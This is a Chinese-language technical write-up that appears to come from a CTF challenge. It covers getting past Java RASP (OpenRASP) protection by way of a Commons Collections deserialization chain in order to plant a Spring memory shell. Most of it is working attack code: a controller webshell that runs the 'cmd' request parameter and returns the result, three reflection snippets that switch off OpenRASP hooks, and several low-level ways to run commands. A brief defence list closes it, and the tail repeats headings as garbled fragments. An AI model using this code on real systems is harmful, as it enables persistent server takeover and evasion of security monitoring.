绕RASP之内存马后渗透技术分析<\/h1>

1. RASP技术概述<\/h2>
RASP（Runtime Application Self-Protection）是一种运行时应用程序自我保护技术，通过在应用程序中注入防护功能来实时监测和阻断攻击。<\/p>

1.1 Java RASP实现原理<\/h3>
通过Instrumentation编写Agent<\/li>
在Agent的premain<\/code>和agentmain<\/code>中加入检测类<\/li>
检测类继承ClassFileTransformer<\/code>，用于监控字节码文件<\/li>
核心接口：

ClassFileTransformer<\/code>：允许在类加载前或重新定义时转换字节码<\/li>
Instrumentation<\/code>：提供启动时代理和重新定义类的能力<\/li>
<\/ul>
<\/li>
<\/ul>
2. 环境搭建与题目分析<\/h2>
2.1 环境复现<\/h3>
docker pull openjdk:8-jdk
<\/span><\/span>docker run -p 45412:8888 -it --rm openjdk:8-jdk sh
<\/span><\/span>java -javaagent:.\/rasp\/rasp.jar -jar DeSpring.jar
<\/span><\/span><\/code><\/pre>2.2 题目分析<\/h3>

\/user\/info<\/code>接口的data<\/code>参数可传入base64编码的恶意字节码<\/li>
存在Commons Collections(CC)依赖<\/li>
SecurityObjectInputStream<\/code>类中有黑名单限制<\/li>
<\/ul>
3. 反序列化链构造<\/h2>
3.1 可用链分析<\/h3>

LazyMap和DefaultedMap未被禁用<\/li>
Hashtable未被禁用<\/li>
使用CC7前半段+CC3后半段的组合链<\/li>
<\/ul>
3.2 利用链流程<\/h3>
Hashtable#readObject()
DefaultedMap#get()
InstantiateTransformer#transform()
    newInstance()
TrAXFilter#TrAXFilter()
TemplatesImpl#newTransformer()
TemplatesImpl#getTransletInstance()
TemplatesImpl#defineTransletClasses
    newInstance()
    Runtime.exec()
<\/code><\/pre>
3.3 关键点<\/h3>

DefaultedMap继承AbstractMapDecorator，会调用父类的equals方法<\/li>
通过DefaultedMap的静态方法decorate传递HashMap<\/li>
利用InstantiateTransformer实例化TrAXFilter类<\/li>
<\/ol>
4. 内存马实现<\/h2>
4.1 基本内存马结构<\/h3>
public<\/span> class<\/span> EvilController<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    public<\/span> EvilController<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 获取Spring上下文
<\/span><\/span><\/span><\/span>        WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span> RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>            .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 获取RequestMappingHandlerMapping实例
<\/span><\/span><\/span><\/span>        RequestMappingHandlerMapping mappingHandlerMapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 反射获取Method对象
<\/span><\/span><\/span><\/span>        Method method =<\/span> EvilController.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"test"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 动态注册controller
<\/span><\/span><\/span><\/span>        Field configField =<\/span> mappingHandlerMapping.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"config"<\/span>);<\/span>
<\/span><\/span>        configField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        RequestMappingInfo.<\/span>BuilderConfiguration<\/span> config =<\/span> (<\/span>RequestMappingInfo.<\/span>BuilderConfiguration<\/span>)<\/span> configField.<\/span>get<\/span>(<\/span>mappingHandlerMapping);<\/span>
<\/span><\/span>        RequestMappingInfo info =<\/span> RequestMappingInfo.<\/span>paths<\/span>(<\/span>"\/shell"<\/span>).<\/span>options<\/span>(<\/span>config).<\/span>build<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        EvilController springBootMemoryShellOfController =<\/span> new<\/span> EvilController(<\/span>"ycxlo"<\/span>);<\/span>
<\/span><\/span>        mappingHandlerMapping.<\/span>registerMapping<\/span>(<\/span>info,<\/span> springBootMemoryShellOfController,<\/span> method);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> void<\/span> test<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 命令执行逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 RASP绕过技术<\/h3>
方法一：修改disableHooks<\/h4>
try<\/span> {<\/span>
<\/span><\/span>    Class<?><\/span> clz =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>().<\/span>loadClass<\/span>(<\/span>"com.baidu.openrasp.config.Config"<\/span>);<\/span>
<\/span><\/span>    Method getConfig =<\/span> clz.<\/span>getDeclaredMethod<\/span>(<\/span>"getConfig"<\/span>);<\/span>
<\/span><\/span>    Field disableHooks =<\/span> clz.<\/span>getDeclaredField<\/span>(<\/span>"disableHooks"<\/span>);<\/span>
<\/span><\/span>    disableHooks.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object ins =<\/span> getConfig.<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>    disableHooks.<\/span>set<\/span>(<\/span>ins,<\/span> true<\/span>);<\/span>
<\/span><\/span>}<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span><\/code><\/pre>方法二：修改hookWhiteAll和cloudSwitch<\/h4>
try<\/span> {<\/span>
<\/span><\/span>    Class<?><\/span> clz =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>().<\/span>loadClass<\/span>(<\/span>"com.baidu.openrasp.config.Config"<\/span>);<\/span>
<\/span><\/span>    Method getConfig =<\/span> clz.<\/span>getDeclaredMethod<\/span>(<\/span>"getConfig"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Field hookWhiteAll =<\/span> clz.<\/span>getDeclaredField<\/span>(<\/span>"hookWhiteAll"<\/span>);<\/span>
<\/span><\/span>    hookWhiteAll.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object ins =<\/span> getConfig.<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>    hookWhiteAll.<\/span>set<\/span>(<\/span>ins,<\/span> true<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    Field cloudSwitch =<\/span> clz.<\/span>getDeclaredField<\/span>(<\/span>"cloudSwitch"<\/span>);<\/span>
<\/span><\/span>    cloudSwitch.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    Object ins2 =<\/span> getConfig.<\/span>invoke<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>    cloudSwitch.<\/span>set<\/span>(<\/span>ins2,<\/span> true<\/span>);<\/span>
<\/span><\/span>}<\/span> catch<\/span> (<\/span>Exception e)<\/span> {}<\/span>
<\/span><\/span><\/code><\/pre>方法三：修改HookHandler<\/h4>
Object o =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.baidu.openrasp.HookHandler"<\/span>).<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>Field f =<\/span> o.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"enableHook"<\/span>);<\/span>
<\/span><\/span>Field m =<\/span> f.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"modifiers"<\/span>);<\/span>
<\/span><\/span>m.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>m.<\/span>setInt<\/span>(<\/span>f,<\/span> f.<\/span>getModifiers<\/span>()<\/span> &<\/span> ~<\/span>Modifier.<\/span>FINAL<\/span>);<\/span>
<\/span><\/span>f.<\/span>set<\/span>(<\/span>o,<\/span> new<\/span> AtomicBoolean(<\/span>false<\/span>));<\/span>
<\/span><\/span><\/code><\/pre>5. 命令执行与文件操作<\/h2>
5.1 创建新进程执行命令<\/h3>
public<\/span> class<\/span> BypassRasp<\/span> extends<\/span> AbstractTranslet implements<\/span> Runnable {<\/span>
<\/span><\/span>    public<\/span> BypassRasp<\/span>()<\/span> {<\/span>
<\/span><\/span>        new<\/span> Thread(<\/span>this<\/span>).<\/span>start<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> run<\/span>()<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            boolean<\/span> isLinux =<\/span> !<\/span>System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>);<\/span>
<\/span><\/span>            String[]<\/span> command =<\/span> isLinux ?<\/span> 
<\/span><\/span>                new<\/span> String[]{<\/span>"sh"<\/span>,<\/span> "-c"<\/span>,<\/span> "ls > \/tmp\/result"<\/span>}<\/span> :<\/span> 
<\/span><\/span>                new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> "calc"<\/span>};<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.2 Hook ProcessImpl执行命令(Windows)<\/h3>
public<\/span> static<\/span> void<\/span> bypass_hook<\/span>(<\/span>String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Class processClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.ProcessImpl"<\/span>);<\/span>
<\/span><\/span>    Method create =<\/span> processClass.<\/span>getDeclaredMethod<\/span>(<\/span>"create"<\/span>,<\/span> 
<\/span><\/span>        String.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> long<\/span>[].<\/span>class<\/span>,<\/span> boolean<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>    create.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    create.<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span> cmd,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> new<\/span> long<\/span>[]{-<\/span>1<\/span>,<\/span> -<\/span>1<\/span>,<\/span> -<\/span>1<\/span>},<\/span> true<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.3 UNIX\/Linux系统命令执行<\/h3>
\/\/ 使用Unsafe绕过
<\/span><\/span><\/span><\/span>Field theUnsafeField =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>theUnsafeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> theUnsafeField.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Class processClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.lang.UNIXProcess"<\/span>);<\/span>
<\/span><\/span>Object processObject =<\/span> unsafe.<\/span>allocateInstance<\/span>(<\/span>processClass);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 详细实现参考完整代码
<\/span><\/span><\/span><\/code><\/pre>5.4 文件读取<\/h3>
File file =<\/span> new<\/span> File(<\/span>".\/result"<\/span>);<\/span>
<\/span><\/span>Scanner c =<\/span> new<\/span> Scanner(<\/span>file).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>);<\/span>
<\/span><\/span>String o =<\/span> c.<\/span>hasNext<\/span>()<\/span> ?<\/span> c.<\/span>next<\/span>()<\/span> :<\/span> "default"<\/span>;<\/span>
<\/span><\/span>c.<\/span>close<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>6. 完整内存马实现（带回显）<\/h2>
public<\/span> class<\/span> EvilController<\/span> extends<\/span> AbstractTranslet implements<\/span> Runnable {<\/span>
<\/span><\/span>    private<\/span> static<\/span> String RESULT =<\/span> "you_are_right"<\/span>;<\/span>
<\/span><\/span>    private<\/span> static<\/span> String CMD =<\/span> "whoami"<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> run<\/span>()<\/span> {<\/span>
<\/span><\/span>        boolean<\/span> isLinux =<\/span> !<\/span>System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>);<\/span>
<\/span><\/span>        String[]<\/span> command =<\/span> isLinux ?<\/span> 
<\/span><\/span>            new<\/span> String[]{<\/span>"sh"<\/span>,<\/span> "-c"<\/span>,<\/span> CMD}<\/span> :<\/span> 
<\/span><\/span>            new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> CMD};<\/span>
<\/span><\/span>        
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            InputStream in =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command).<\/span>getInputStream<\/span>();<\/span>
<\/span><\/span>            Scanner scanner =<\/span> new<\/span> Scanner(<\/span>in).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>);<\/span>
<\/span><\/span>            RESULT =<\/span> scanner.<\/span>hasNext<\/span>()<\/span> ?<\/span> scanner.<\/span>next<\/span>()<\/span> :<\/span> ""<\/span>;<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> void<\/span> test<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        HttpServletRequest request =<\/span> ((<\/span>ServletRequestAttributes)<\/span> RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>();<\/span>
<\/span><\/span>        HttpServletResponse response =<\/span> ((<\/span>ServletRequestAttributes)<\/span> RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getResponse<\/span>();<\/span>
<\/span><\/span>        String cmd =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        if<\/span> (<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            PrintWriter printWriter =<\/span> response.<\/span>getWriter<\/span>();<\/span>
<\/span><\/span>            CMD =<\/span> cmd;<\/span>
<\/span><\/span>            new<\/span> Thread(<\/span>this<\/span>).<\/span>start<\/span>();<\/span>
<\/span><\/span>            printWriter.<\/span>write<\/span>(<\/span>RESULT);<\/span>
<\/span><\/span>            printWriter.<\/span>flush<\/span>();<\/span>
<\/span><\/span>            printWriter.<\/span>close<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>7. 防御建议<\/h2>

加强RASP规则，监控关键类的反射调用<\/li>
限制Instrumentation API的使用权限<\/li>
监控内存马的动态注册行为<\/li>
实施严格的输入验证和过滤<\/li>
定期更新RASP规则库<\/li>
<\/ol>
通过以上技术分析，我们详细了解了如何绕过RASP防护实现内存马注入和命令执行，同时也为防御此类攻击提供了参考方向。<\/p>
绕RASP之内存马后渗透技术分析<\/h1>

1. RASP技术概述<\/h2> RASP（Runtime Application Self-Protection）是一种运行时应用程序自我保护技术，通过在应用程序中注入防护功能来实时监测和阻断攻击。<\/p>

2. 环境搭建与题目分析<\/h2>

3. 反序列化链构造<\/h2>

4. 内存马实现<\/h2>

4.2 RASP绕过技术<\/h3>

5. 命令执行与文件操作<\/h2>

1. RASP技术概述<\/h2>
RASP（Runtime Application Self-Protection）是一种运行时应用程序自我保护技术，通过在应用程序中注入防护功能来实时监测和阻断攻击。<\/p>
